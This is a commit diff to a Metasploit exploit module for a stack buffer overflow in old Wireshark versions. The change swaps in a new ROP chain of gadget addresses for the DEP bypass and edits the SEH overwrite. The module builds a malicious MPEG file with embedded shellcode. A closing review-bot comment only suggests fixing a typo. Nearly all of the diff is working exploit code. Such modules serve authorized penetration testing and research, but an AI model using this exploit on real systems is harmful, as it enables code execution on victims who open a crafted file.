
Commit feea4c1

committed
ROP chain changed
1 parent e811e16 commit feea4c1


1 file changed

+17
-16
lines changed


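--- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb
+++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def initialize(info = {})
 super(update_info(info,
-'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC',
+'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
 'Description' => %q{
 This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
 by generating an malicious file.)
@@ -48,7 +48,7 @@ def initialize(info = {})
 [ 'WinXP SP3 Spanish (bypass DEP)',
 {
 'OffSet' => 70692,
-'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
+'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
 'jmpesp' => 0x68e2bfb9,
 }
 ],
@@ -66,28 +66,29 @@ def initialize(info = {})
 def junk
 return rand_text(4).unpack("L")[0].to_i
 end
+
 def create_rop_chain()
 
 # rop chain generated with mona.py - www.corelan.be
 rop_gadgets =
 [
-0x78b41ccb, # POP EAX # RETN [MSVCR100.dll]
+0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
-0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll]
-0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll]
-0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll]
-0x63cd04f1, # & push esp # ret [liblzma-5.dll]
-0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll]
+0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
+0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
 0x00000201, # 0x00000201-> ebx
-0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll]
+0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
 0x00000040, # 0x00000040-> edx
-0x78b29eda, # POP ECX # RETN [MSVCR100.dll]
+0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
 0x668242b9, # &Writable location [libgnutls-26.dll]
-0x70f67579, # POP EDI # RETN [libxml2-2.dll]
+0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
-0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll]
+0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
 0x90909090, # nop
-0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll]
+0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
 ].flatten.pack("V*")
 
 return rop_gadgets
@@ -98,14 +99,14 @@ def exploit
 
 print_status("Creating '#{datastore['FILENAME']}' file ...")
 magic_header = "\xff\xfb" # mpeg magic_number
-packet = pattern_create(892)
+packet = pattern_create(892)
 ropchain = create_rop_chain
 packet << ropchain
 packet << payload.encoded # Shellcode
 packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
 # SEH pointers overwrite (nseh & seh)
-packet << "\x90\x90\x90\x90" # nseh
-# 0xff is badchar then we can't make a jump back with jmp $-2000
+packet << make_nops(4) # nseh
+# \0xff is a badchar then we can't make a jump back with jmp $-2000
 # After nseh and seh we haven't space, then we have to jump to another location.
 # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA
 packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN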
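Review bot: The module description in the first hunk still reads `by generating an malicious file.)` even though the commit reworded the adjacent `'Name'` entry; the article is wrong and the trailing parenthesis looks stray, since the `%q{` string is closed by a brace elsewhere. I would change that line to `by generating a malicious file.` so the user-facing module info reads cleanly. The `initialize` body this sits in starts and continues outside the hunk, so the rest of the description text is not visible here.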
